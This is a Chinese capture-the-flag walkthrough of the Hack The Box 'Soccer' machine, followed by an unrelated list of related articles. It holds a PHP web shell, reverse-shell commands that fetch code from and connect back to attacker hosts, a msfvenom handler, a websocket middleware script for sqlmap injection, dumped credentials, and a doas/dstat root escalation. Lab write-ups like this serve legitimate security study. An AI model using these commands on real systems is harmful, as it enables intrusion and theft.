HTB soccer

news2024/11/16 12:48:37

title: HTB_soccer
description: HTB靶机 难度:easy
date: 2023-05-31
categories:

  • [渗透,靶机]

HTB soccer

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.11.194
[sudo] kali 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-30 21:02 CST
Warning: 10.10.11.194 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.194 (10.10.11.194)
Host is up (0.17s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
9091/tcp open  xmltec-xmlmail

Nmap done: 1 IP address (1 host up) scanned in 23.54 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -O -p22,80,9091 soccer   
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-30 21:04 CST
Nmap scan report for soccer (10.10.11.194)
Host is up (0.16s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
9091/tcp open  xmltec-xmlmail?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9091-TCP:V=7.93%I=7%D=5/30%Time=6475F465%P=x86_64-pc-linux-gnu%r(in
SF:formix,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r
SF:\n\r\n")%r(drda,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x
SF:20close\r\n\r\n")%r(GetRequest,168,"HTTP/1\.1\x20404\x20Not\x20Found\r\
SF:nContent-Security-Policy:\x20default-src\x20'none'\r\nX-Content-Type-Op
SF:tions:\x20nosniff\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nCo
SF:ntent-Length:\x20139\r\nDate:\x20Tue,\x2030\x20May\x202023\x2013:04:42\
SF:x20GMT\r\nConnection:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang
SF:=\"en\">\n<head>\n<meta\x20charset=\"utf-8\">\n<title>Error</title>\n</
SF:head>\n<body>\n<pre>Cannot\x20GET\x20/</pre>\n</body>\n</html>\n")%r(HT
SF:TPOptions,16C,"HTTP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Pol
SF:icy:\x20default-src\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\n
SF:Content-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20143\
SF:r\nDate:\x20Tue,\x2030\x20May\x202023\x2013:04:43\x20GMT\r\nConnection:
SF:\x20close\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<me
SF:ta\x20charset=\"utf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>C
SF:annot\x20OPTIONS\x20/</pre>\n</body>\n</html>\n")%r(RTSPRequest,16C,"HT
SF:TP/1\.1\x20404\x20Not\x20Found\r\nContent-Security-Policy:\x20default-s
SF:rc\x20'none'\r\nX-Content-Type-Options:\x20nosniff\r\nContent-Type:\x20
SF:text/html;\x20charset=utf-8\r\nContent-Length:\x20143\r\nDate:\x20Tue,\
SF:x2030\x20May\x202023\x2013:04:43\x20GMT\r\nConnection:\x20close\r\n\r\n
SF:<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n<meta\x20charset=\"u
SF:tf-8\">\n<title>Error</title>\n</head>\n<body>\n<pre>Cannot\x20OPTIONS\
SF:x20/</pre>\n</body>\n</html>\n")%r(RPCCheck,2F,"HTTP/1\.1\x20400\x20Bad
SF:\x20Request\r\nConnection:\x20close\r\n\r\n")%r(DNSVersionBindReqTCP,2F
SF:,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\n\r\n")%
SF:r(DNSStatusRequestTCP,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnect
SF:ion:\x20close\r\n\r\n")%r(Help,2F,"HTTP/1\.1\x20400\x20Bad\x20Request\r
SF:\nConnection:\x20close\r\n\r\n")%r(SSLSessionReq,2F,"HTTP/1\.1\x20400\x
SF:20Bad\x20Request\r\nConnection:\x20close\r\n\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 5.0 (96%), Linux 4.15 - 5.6 (95%), Linux 5.3 - 5.4 (95%), Linux 2.6.32 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.80 seconds
┌──(kali㉿kali)-[~/Tools/fscan]
└─$ ./fscan -h soccer    

   ___                              _  
  / _ \     ___  ___ _ __ __ _  ___| | __ 
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <  
\____/     |___/\___|_|  \__,_|\___|_|\_\   
                     fscan version: 1.8.2
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target soccer          is alive
[*] Icmp alive hosts len is: 1
soccer:9091 open
Open result.txt error, open result.txt: permission denied
soccer:22 open
Open result.txt error, open result.txt: permission denied
soccer:80 open
Open result.txt error, open result.txt: permission denied
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://soccer             code:301 len:178    title:301 Moved Permanently 跳转url: http://soccer.htb/
Open result.txt error, open result.txt: permission denied
[*] WebTitle: http://soccer.htb/        code:200 len:6917   title:Soccer - Index
Open result.txt error, open result.txt: permission denied
[*] WebTitle: http://soccer:9091        code:404 len:139    title:Error
Open result.txt error, open result.txt: permission denied

80端口看没什么东西,也没有功能点,现在有四个思路:

  1. 子域名爆破
  2. 目录爆破
  3. 9091端口后续利用
  4. nday利用

子域名爆破

┌──(kali㉿kali)-[~]
└─$ sudo gobuster vhost -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u soccer.htb --append-domain
[sudo] kali 的密码:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:             http://soccer.htb
[+] Method:          GET
[+] Threads:         50
[+] Wordlist:        /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent:      gobuster/3.5
[+] Timeout:         10s
[+] Append Domain:   true
===============================================================
2023/05/30 21:20:00 Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 99922 / 100001 (99.92%)
===============================================================
2023/05/30 21:26:20 Finished
===============================================================

目录爆破

┌──(kali㉿kali)-[~/Tools/dirsearch]
└─$ sudo ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 100 -mc 200,301 -u http://soccer.htb/FUZZ

        /'___\  /'___\           /'___\   
       /\ \__/ /\ \__/  __  __  /\ \__/   
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\  
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/  
         \ \_\   \ \_\  \ \____/  \ \_\   
          \/_/    \/_/   \/___/    \/_/   

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://soccer.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 100
 :: Matcher          : Response status: 200,301
________________________________________________

...
[Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 165ms]
    * FUZZ: tiny
...
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -u http://soccer.htb/              
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://soccer.htb/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/05/30 21:55:49 Starting gobuster in directory enumeration mode
===============================================================
/tiny                 (Status: 301) [Size: 178] [--> http://soccer.htb/tiny/]                                                                         
Progress: 172328 / 220561 (78.13%)^C
[!] Keyboard interrupt detected, terminating.

===============================================================
2023/05/30 22:08:10 Finished
===============================================================

都扫到了/tiny目录,访问看看:

image

账号密码:

image

getshell

有个文件上传的地方只能执行一次命令,执行完一次就会给删了

另外说一句这里好像有和公网服务器交互,不上梯子很卡,上完梯子之后好多了

image

我们上传文件:

image

普通的一句话木马就可以了

上传完访问/tiny/uploads/shell.php​就可以访问到木马了,这里只能执行一次,利用反弹shell

  1. curl反弹shell

    本地服务器新建一个文件,命名1.html,内容为:bash -i >& /dev/tcp/10.10.14.9/2333 0>&1|bash

    使用木马发送curl 10.10.14.9/1.html|bash

  2. 用msf的反弹shel

    msfvenom -p php/meterpreter/reverse_tcpLHOST=10.10.14.9 LPORT=4444 R > shell1.php

    msf > use exploit/multi/handler

    msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp

    msfexploit(multi/handler) > set LHOST 10.10.14.9

    msfexploit(multi/handler) > set LPORT 4444

拿到shell之后发现权限很低,找办法提权,发现sudo -l​或者suid提权​什么的都行不通

学到这样一个知识:

image

那我们就去服务器下寻找他nginx的相关配置文件:/etc/nginx/sites-enabled

image

发现一个子域名,添加到/etc/hosts

访问后进行注册登陆:(登陆注册过程中并未测到有用漏洞)

​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aIxRrK6E-1685533608804)(https://qing3feng.github.io/Blogimages/HTB_soccer/image-20230531133510-u785j2e.png)]​​​

这里可以对发送的数据进行抓包并进行测试:

image

可以看到这里是存在sql注入的,但是发现写脚本去测试好像总是返回404,测试不了

image

后来发现可以自己搭建一个类似中转站的东西,可以看网页源代码:

image

这里是建立了一个ws的接口用于发送数据

我们可以通过以下脚本连建立连接从而可以使用sqlmap来进行注入

from http.server import SimpleHTTPRequestHandler
from socketserver import TCPServer
from urllib.parse import unquote, urlparse
from websocket import create_connection

ws_server = "ws://soc-player.soccer.htb:9091" # 要修改

def send_ws(payload):
	ws = create_connection(ws_server)
	# If the server returns a response on connect, use below line
	#resp = ws.recv() # If server returns something like a token on connect you can find and extract from here

	# For our case, format the payload in JSON
	message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
	data = '{"id":"%s"}' % message # 要修改

	ws.send(data)
	resp = ws.recv()
	ws.close()

	if resp:
		return resp
	else:
		return ''

def middleware_server(host_port,content_type="text/plain"):

	class CustomHandler(SimpleHTTPRequestHandler):
		def do_GET(self) -> None:
			self.send_response(200)
			try:
				payload = urlparse(self.path).query.split('=',1)[1]
			except IndexError:
				payload = False
		
			if payload:
				content = send_ws(payload)
			else:
				content = 'No parameters specified!'

			self.send_header("Content-type", content_type)
			self.end_headers()
			self.wfile.write(content.encode())
			return

	class _TCPServer(TCPServer):
		allow_reuse_address = True

	httpd = _TCPServer(host_port, CustomHandler)
	httpd.serve_forever()


print("[+] Starting MiddleWare Server")
print("[+] Send payloads in http://localhost:8081/?id=*")

try:
	middleware_server(('0.0.0.0',8081))
except KeyboardInterrupt:
	pass

sqlmap命令如下:

┌──(kali㉿kali)-[~]
└─$ sqlmap -u "http://127.0.0.1:8081/?id=59268 and 1=1" --dump
        ___
       __H__                                                              
 ___ ___["]_____ ___ ___  {1.7.2#stable}                                  
|_ -| . [']     | .'| . |                                                 
|___|_  [.]_|_|_|__,|  _|                                                 
      |_|V...       |_|   https://sqlmap.org 
....
[17:44:02] [INFO] resumed: 1
[17:44:02] [INFO] resuming partial value: player@player.
[17:44:02] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 
[18:00:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
[18:00:23] [INFO] adjusting time delay to 2 seconds due to good response times
htb
[18:00:50] [INFO] retrieved: 1324
[18:01:31] [INFO] retrieved: PlayerO
[18:02:56] [ERROR] invalid character detected. retrying..
[18:02:56] [WARNING] increasing time delay to 3 seconds
ftheMatch2022
[18:05:42] [INFO] retrieved: player
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id   | email             | password             | username |
+------+-------------------+----------------------+----------+
| 1324 | player@player.htb | PlayerOftheMatch2022 | player   |
+------+-------------------+----------------------+----------+

[18:07:03] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/kali/.local/share/sqlmap/output/127.0.0.1/dump/soccer_db/accounts.csv'         
[18:07:03] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/127.0.0.1'                                           

[*] ending @ 18:07:03 /2023-05-31/

提权

ssh登陆后就是提权了,发现sudo -l用不了

就用find / -perm -u=s -type f 2 >/dev/null

player@soccer:~$ find / -perm -u=s -type f 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign

刚开始找一圈没找到提权的点,后来才知道/usr/local/bin/doas​可以提权

这个如何提权呢

/usr/local/share/dstat/​下创建一个文件命名为:dstat_shell.py​,内容为:

import os
os.system("bash -i")

输入命令:

doas -u root /usr/bin/dstat --list​ -> 查看可用插件

player@soccer:/usr/local/share/dstat$ doas -u root /usr/bin/dstat --list
internal:
 aio,cpu,cpu-adv,cpu-use,cpu24,disk,disk24,disk24-old,
 epoch,fs,int,int24,io,ipc,load,lock,mem,mem-adv,net,
 page,page24,proc,raw,socket,swap,swap-old,sys,tcp,time,
 udp,unix,vm,vm-adv,zones
/usr/share/dstat:
 battery,battery-remain,condor-queue,cpufreq,dbus,disk-avgqu,
 disk-avgrq,disk-svctm,disk-tps,disk-util,disk-wait,dstat,
 dstat-cpu,dstat-ctxt,dstat-mem,fan,freespace,fuse,gpfs,
 gpfs-ops,helloworld,ib,innodb-buffer,innodb-io,innodb-ops,
 jvm-full,jvm-vm,lustre,md-status,memcache-hits,mongodb-conn,
 mongodb-mem,mongodb-opcount,mongodb-queue,mongodb-stats,
 mysql-io,mysql-keys,mysql5-cmds,mysql5-conn,mysql5-innodb,
 mysql5-innodb-basic,mysql5-innodb-extra,mysql5-io,mysql5-keys,
 net-packets,nfs3,nfs3-ops,nfsd3,nfsd3-ops,nfsd4-ops,
 nfsstat4,ntp,postfix,power,proc-count,qmail,redis,rpc,
 rpcd,sendmail,snmp-cpu,snmp-load,snmp-mem,snmp-net,
 snmp-net-err,snmp-sys,snooze,squid,test,thermal,top-bio,
 top-bio-adv,top-childwait,top-cpu,top-cpu-adv,top-cputime,
 top-cputime-avg,top-int,top-io,top-io-adv,top-latency,
 top-latency-avg,top-mem,top-oom,utmp,vm-cpu,vm-mem,
 vm-mem-adv,vmk-hba,vmk-int,vmk-nic,vz-cpu,vz-io,vz-ubc,
 wifi,zfs-arc,zfs-l2arc,zfs-zil
/usr/local/share/dstat:
 shell

如果看到/usr/local/share/dstat​有shell则说明可以利用了:

player@soccer:/usr/local/share/dstat$ doas -u root /usr/bin/dstat --shell
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
  import imp
root@soccer:/usr/local/share/dstat# cd /root
root@soccer:~# cat root.txt
1806c1110c263bxxxxxxxxxxxxx

提权的原理大概就是doas是一个类似于sudo的命令,他有插件,保存的位置如下:

 /usr/share/dstat/
 /usr/local/share/dstat/

因为dstat是支持用户自定义插件的,所以如果用户对这两个目录有可写入权限,那么就可以利用插件提权。

不仅可以写入:

import os
os.system("bash -i")

还可以写入反弹shell:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.64.128",2333));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/594707.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

路径规划算法:基于水循环优化的路径规划算法- 附代码

路径规划算法&#xff1a;基于水循环优化的路径规划算法- 附代码 文章目录 路径规划算法&#xff1a;基于水循环优化的路径规划算法- 附代码1.算法原理1.1 环境设定1.2 约束条件1.3 适应度函数 2.算法结果3.MATLAB代码4.参考文献 摘要&#xff1a;本文主要介绍利用智能优化算法…

【数据分享】1929-2022年全球站点的逐年最高气温(Shp\Excel\12000个站点)

气象数据是在各项研究中都经常使用的数据&#xff0c;气象指标包括气温、风速、降水、湿度等指标&#xff0c;其中又以气温指标最为常用&#xff01;说到气温数据&#xff0c;最详细的气温数据是具体到气象监测站点的气温数据&#xff01; 之前我们分享过1929-2022年全球气象站…

工业智能终端配合MES系统真的可以提高生产效率吗?

工业智能终端可以实现数据分析和预测&#xff0c;通过对生产数据的分析和预测&#xff0c;可以更好地把握生产趋势和变化&#xff0c;及时调整生产计划和资源配置&#xff0c;提高生产效率和降低成本。 工业显示交互终端&#xff1a;解决MES系统软硬结合的难题&#xff0c;集显…

交叉编译成LoongArch(Makefile,CMake,AutoTool,Qt等方式)

在嵌入板卡中由于资源有限常常使用像busybox这样的轻量文件系统。由于这类轻量文件系统没有编译系统在里面&#xff0c;所以如果需要软件在板卡上运行&#xff0c;那么交叉编译是必不可少的。 如果对交叉编译(cross compile)这个概念不太清楚的话&#xff0c;可以参考以下的一…

加盐算法:手撕+Spring Security、提高密码安全性的必杀技

目录 一、概念和理解 &#xff08;一&#xff09;MD5加密 &#xff08;二&#xff09;加密解密过程 &#xff08;三&#xff09;加盐 1.什么是盐值&#xff1f; 2.如何加盐? 二、手写加盐算法 &#xff08;一&#xff09;密码工具类 &#xff08;二&#xff09;项目改动 注册 …

Spring Boot如何实现自定义Spring Boot启动器

Spring Boot如何实现自定义Spring Boot启动器 在Spring Boot中&#xff0c;启动器&#xff08;Starter&#xff09;是一组依赖项的集合&#xff0c;它们一起提供了某个特定的功能。使用Spring Boot启动器可以让我们更加方便地集成第三方库和框架&#xff0c;并且可以避免版本冲…

2023年京东618预售数据重磅出炉!(大家电篇:预售额550亿)

2023年5月23日至5月31日&#xff0c;京东618预售期正式落幕。今年的预售&#xff0c;不少行业及品牌首战告捷&#xff0c;拿下了不错的成绩。 数据统计时间&#xff1a;5月23日至5月30日 平台&#xff1a;京东 今晚&#xff0c;鲸参谋率先来盘点一下大家电行业在23日至30日预售…

知名大厂的UI组件库有哪些?

以下是 5 款优秀的 UI 设计组件库的推荐&#xff0c;这些组件库都可以免费获取&#xff0c;帮助你解答疑惑&#xff0c;提供设计参考&#xff0c;并提高工作效率 1、MUI&#xff08;Material-UI&#xff09; 包含 60 类别的 UI 设计组件&#xff0c;可在即时设计资源广场一…

开源!AREX接口自动化回归测试的全过程

AREX是一款开源的基于真实请求与数据的自动化回归测试平台&#xff08;项目地址&#xff1a;https://github.com/arextest&#xff09;&#xff0c;利用JavaAgent技术与比对技术&#xff0c;通过流量录制回放能力实现快速有效的回归测试。同时提供了接口测试、接口比对测试等丰…

Sentinel 介绍及整合OPenFeign及GateWay

Sentinel 介绍 随着微服务的流行&#xff0c;服务和服务之间的稳定性变得越来越重要。 Sentinel 以流量为切入点&#xff0c;从流量控制、熔断降级、系统负载保护等多个维度保护服务的稳定性。 Sentinel 具有以下特征: 丰富的应用场景&#xff1a; Sentinel 承接了阿里巴巴近…

IDEA 插件上新! 生成接口文档就是这么快!

当有接口对接需求的时候&#xff0c;开发终于不用再担心 API 文档难写了&#xff0c;也不用再一个个接口文档重新写&#xff01;安装这个 IDEA 插件&#xff0c;可以一步将文档导入到 Postcat。 这款插件操作简单&#xff0c;容易上手&#xff0c;能够让开发者省去API文档编写的…

STM32G0x0系列-软件定时器解决HAL_Delay问题

目录 HAL_Delay函数源码 软件定时器 创建工程试验 1.将对应文件移动到项目位置 2.添加现有文件放到工程中 3.重定向printf 3.验证自己的软件定时器 4.查看现象 HAL_Delay函数使用了中断机制来实现延时功能&#xff0c;当在中断函数中调用HAL_Delay函数需要考虑中断优先…

《操作系统》by李治军 | 实验5.pre - copy_process 代码详解

目录 【前言】 代码分析 1. 申请子进程 PCB 空间 2. 找到子进程的内核栈 3. 父子进程共用同一内存、堆栈和数据代码块 4. 相关寄存器入栈 5. switch_to 返回位置 6. 响应 switch_to 的弹栈工作 7. 更新子进程 PCB 8. 子进程切换流程 【前言】 在李治军老师的《操作系…

MyBatis——缓存

是一种临时存储少量数据至内存或者是磁盘的一种技术.减少数据的加载次数,可以降低工作量,提高程序响应速度 缓存的重要性是不言而喻的。mybatis的缓存将相同查询条件的SQL语句执行一遍后所得到的结果存在内存或者某种缓存介质当中&#xff0c;当下次遇到一模一样的查询SQL时候…

Yolov8涨点神器:ODConv+ConvNeXt提升小目标检测能力

1.涨点神器结合,助力YOLO 1.1 ICLR 2022涨点神器——即插即用的动态卷积ODConv 论文:Omni-Dimensional Dynamic Convolution 论文地址:Omni-Dimensional Dynamic Convolution | OpenReview ODConv通过并行策略引入一种多维注意力机制以对卷积核空间的四个维度学习更灵活的…

项目所需的Python版本+国内源+虚拟环境+用Conda创建环境

文章目录 &#xff08;一&#xff09;Python&#xff08;1.1&#xff09;国内源&#xff08;1.2&#xff09;设置源&#xff08;全局&#xff09;&#xff08;1.3&#xff09;使用源&#xff08;单次&#xff09; &#xff08;二&#xff09;Python环境&#xff08;2.1&#xf…

【数据结构与算法】力扣:栈和队列(一)

1 请你仅使用两个栈实现先入先出队列。队列应当支持一般队列支持的所有操作&#xff08;push、pop、peek、empty&#xff09;&#xff1a; 实现 MyQueue 类&#xff1a; void push(int x) 将元素 x 推到队列的末尾 int pop() 从队列的开头移除并返回元素 int peek() 返回队列开…

vue diff算法与虚拟dom知识整理(13) 手写patch子节点更新换位策略

上一文中我们编写了 patch中新旧节点都有子节点的 插入节点的逻辑 但旧节点的子节点发生顺序 或数量变化 我们还没有处理 那我们现在继续 我们先来看看 原本是怎么写的 我们打开我们的案例 找到 node_modules 下面的snabbdom/src下面的 init.ts文件 我们在里面找到一个 updat…

Openai+Deeplearning.AI: ChatGPT Prompt Engineering(六)

想和大家分享一下最近学习的Deeplearning.AI和openai联合打造ChatGPT Prompt Engineering在线课程.以下是我写的关于该课程的前五篇博客&#xff1a; ChatGPT Prompt Engineering(一)ChatGPT Prompt Engineering(二)ChatGPT Prompt Engineering(三)ChatGPT Prompt Engineering…